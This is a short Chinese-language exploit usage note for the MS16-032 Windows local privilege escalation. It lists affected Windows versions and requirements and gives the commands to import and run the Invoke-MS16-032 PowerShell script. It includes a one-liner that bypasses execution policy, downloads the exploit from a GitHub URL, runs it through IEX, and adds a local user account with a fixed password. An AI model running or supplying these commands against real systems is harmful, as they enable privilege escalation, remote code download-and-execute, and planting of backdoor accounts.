此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行
Product | CPU Architecture | Version | Update | Tested |
---|---|---|---|---|
Windows 10 | ||||
Windows 10 | 1511 | |||
Windows 7 | SP1 | ✔ | ||
Windows 8.1 | ||||
Windows Rt 8.1 | ||||
Windows Server 2008 | SP2 | ✔ | ||
Windows Server 2008 | R2 | SP1 | ✔ | |
Windows Server 2012 | ||||
Windows Server 2012 | R2 | |||
Windows Vista | SP2 |
目标系统需要有2个以上的CPU核心
PS脚本测试,在Windows Server 2008 R2 SP1 x64执行下面命令
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
还能远程添加账户
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user ascotbe test6666 /add'"
GIF图如下
利用exe文件测试通杀x64和x86的所有版本,这边只录制Windows 7 SP1 x64版本的